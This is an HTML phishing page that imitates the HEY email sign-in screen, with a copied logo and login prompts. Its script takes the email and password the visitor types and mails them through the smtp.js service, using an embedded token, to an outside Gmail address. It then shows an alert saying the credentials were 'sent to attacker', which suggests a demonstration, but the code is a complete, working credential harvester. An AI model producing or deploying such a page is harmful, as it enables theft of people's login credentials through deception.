<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/html">
<head>
    <script defer="" data-domain="http://flashitt.s3-website.ap-south-1.amazonaws.com" src="/js/script.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <style>
        .myDiv {
          border: 5px outset red;
          background-color: lightblue;
          text-align: center;
        }
        h1 {
            font-size : 280%;
            font-weight : bold;
            margin-bottom:0px;
            padding-bottom:0px;
            text-align: center;
        }
        .font {
            font-family:-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
        }
        .form__field {
  font-family: inherit;
  width: 70%;
  border: 0;
  border-bottom: 1px solid;
  outline: 0;
  font-size: 1.3rem;
  color: $white;
  padding: 7px 0;
  border-bottom-style: dashed;
  background: transparent;
  transition: border-color 0.2s;
  text-align : center;
  font-family:-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
     font-weight : bold;

}
.form__field:focus {
     border-color : rgb(85 34 250);
     caret-color : rgb(85 34 250);
     font-family:-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
     font-weight : bold;
     text-align : center;

}
.btn{
    display: inline-block;
    margin: 20px;
    padding: 10px;
    padding-left:20px;
    padding-right:20px;
    font-weight: bold;
    text-decoration: none;
    border-radius: 3rem;
    white-space: nowrap;
    background-color: rgba(0,0,0,0);
    color: white;
    border: 1px solid;
    transition: background-color 150ms ease;
    font-size : 20px;
}
.btn--tertiary {
    background: #5522fa;
    color: white;
}
    </style>
</head>
<body style="background-color:white;">
<div style="text-align: center;width:50%;margin:auto;">
    <svg width="82px" height="38px" viewBox="0 0 81.63 37.39" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
        <linearGradient id="hey-logo-gradient" gradientUnits="userSpaceOnUse" x1="-1.9" x2="82.16" y1="18.49" y2="18.49">
            <stop class="gradient-start" offset="0" stop-color="#4145f1"></stop>
            <stop class="gradient-end" offset=".99" stop-color="#4145f1"></stop>
        </linearGradient>
        <linearGradient id="hey-logo-gradient-b" x1="-1.9" x2="82.16" xlink:href="#hey-logo-gradient" y1="18.7" y2="18.7"></linearGradient>
        <path d="m80.85 6.27h-4.41a1.78 1.78 0 0 0 -1.57 1.11l-1 2.88-.8 2.23-1.12 3.23a5.7 5.7 0 0 1 -.47 1.11 5.29 5.29 0 0 1 -.48-1.12l-1.07-3.21c-.21-.62-.56-1.62-.78-2.24l-1-2.88a1.78 1.78 0 0 0 -1.58-1.11h-16.96a1.18 1.18 0 0 0 -1.18 1.18v6.73a1.19 1.19 0 0 1 -1.19 1.19h-4.92a1.2 1.2 0 0 1 -1.19-1.19v-6.73a1.18 1.18 0 0 0 -1.13-1.18h-4.1a1.19 1.19 0 0 0 -1.19 1.18v3.11c2.18 2.78 2.18 7.84 0 15.38v3.59a1.19 1.19 0 0 0 1.19 1.18h4.1a1.18 1.18 0 0 0 1.18-1.18v-7.34a1.19 1.19 0 0 1 1.14-1.19h4.92a1.18 1.18 0 0 1 1.19 1.18v7.34a1.18 1.18 0 0 0 1.18 1.18h13.83a1.18 1.18 0 0 0 1.18-1.18v-3.04a1.18 1.18 0 0 0 -1.18-1.18h-7.34a1.19 1.19 0 0 1 -1.18-1.19v-2a1.19 1.19 0 0 1 1.18-1.19h4.43a1.18 1.18 0 0 0 1.18-1.18v-3.04a1.18 1.18 0 0 0 -1.18-1.18h-4.43a1.19 1.19 0 0 1 -1.18-1.19v-1.46a1.18 1.18 0 0 1 1.18-1.19h6a2 2 0 0 1 1.67 1.08l3.89 8.45a6.29 6.29 0 0 1 .5 2.26v6.06a1.18 1.18 0 0 0 1.18 1.18h4.1a1.18 1.18 0 0 0 1.19-1.18v-6.06a6.5 6.5 0 0 1 .49-2.26l6.42-13.87a.7.7 0 0 0 -.69-1.07z" fill="url(#hey-logo-gradient)"></path>
        <path d="m29 10.43a8.92 8.92 0 0 0 -4.12 2.45c-1.31-4.6-4.13-11.56-6.88-12.7a2 2 0 0 0 -1.84.08c-1.72 1-2.84 4.22-1.86 10.32-3.78-6.92-5.1-6.91-5.71-6.92a1.49 1.49 0 0 0 -1.36.93c-.41.91-1.23 3.75.77 9.86-2.41-3.3-3.15-3.72-4-3.68a1.51 1.51 0 0 0 -1.28.87c-.72 1.36-.64 4.78 1.6 9.88a4.59 4.59 0 0 0 -2.76-1.14 1.65 1.65 0 0 0 -1.33.85c-.91 1.67 1 6.36 3.36 9.54 1.91 2.61 5.74 6.62 11.3 6.62a12.54 12.54 0 0 0 2.32-.22 1 1 0 0 0 -.39-2c-4.62.9-8.1-1.64-10.21-3.92-3.15-3.41-4.53-7.51-4.61-8.76.66.27 2.56 1.39 6.26 6.13a1 1 0 0 0 1.65-1.18c-5.2-7.89-5.71-12.67-5.54-14.28 1.53 1.56 5.35 7.28 8.23 11.6a1 1 0 0 0 1.37.31 1 1 0 0 0 .37-1.36c-6-11-5.79-16-5.44-17.68.9.91 3.29 4.08 8.32 15a1 1 0 0 0 1.31.51 1 1 0 0 0 .57-1.29c-4.88-13.25-2.76-17.74-1.95-18.25 1.05 0 4 5.06 5.84 11.69.11.41.22.81.32 1.2a6.38 6.38 0 0 0 -.6 1.44c-1 3.67-2 12-.07 14.29a1.86 1.86 0 0 0 1.62.69 2.63 2.63 0 0 0 1.92-1.18c1.79-2.61.74-9.16-.69-14.89a7.53 7.53 0 0 1 4-2.87 2 2 0 0 1 2 .48c.82.92 2.25 4.36-2.09 16.49a1 1 0 0 0 1.92.68c3.46-9.67 4-15.9 1.69-18.52a3.94 3.94 0 0 0 -4.01-1.07zm-4.5 18.57a.64.64 0 0 1 -.34.29c-.75-.89-.75-6.16.07-10.48 1.55 7.47.65 9.66.27 10.19z" fill="url(#hey-logo-gradient-b)"></path>
    </svg>
    <h1 class="font" style="margin-top: 150px;">Welcome back.</h1>
    <h1 class="font" style="margin-top: 0px;">Let's sign In.</h1>
    <h2 class="font" style="font-weight: normal;margin-top:50px;">Enter  your  email  address</h2>
    <input class="form__field" required="required" autocomplete="email" autofocus="autofocus" autocorrect="off" autocapitalize="off" size="30" type="email" name="email_address" id="email_address">
    <h2 class="font" style="font-weight: normal;margin-top:50px;">And your password</h2>
    <input class="form__field" type="password" required="required" autocomplete="email" autofocus="autofocus" autocorrect="off" autocapitalize="off" size="30" type="email" name="email_address" id="password">
    <form onsubmit="test()">
        <input type="submit" name="commit" value="Sign in" class="btn btn--focusable btn--tertiary align--center txt--large btn-with-spinner" data-form-target="submit" data-disable-with="Sign in">
    </form>
    <a href="//google.com" class="font" style="font-weight:bold;font-size:18px;color: rgb(0 116 228);">Forgot your password?</a>
    <p style="color:rgb(35 28 51 / 66%);margin:0px;" class="font">We’ll help you reset it so you can get back in.</p>
    <script>
        function test() {
            var t2 = document.getElementById("email_address").value;
            var t1 = document.getElementById("password").value;

            Email.send({
               SecureToken : "3a56b7db-932e-497f-8bf2-8c3c1a0e7d96",
                To : "palanisamyown@gmail.com",
                From: "leocarsgarage@gmail.com",
                Subject: "Testing",
                Body:"body" + t2 + "  " + t1,
                }).then(
                message =>{
                   
                    if(message=='OK'){
                        alert('Your username : ' + t2 + '  and password ' + t1 + ' sent to attacker');
                    }
                    else{
                        console.error (message);
                        alert('There is error at sending e-mail. ')
                    }
                }
            );
            alert('Finished');
        }
    </script>
</div>
</body>
</html>
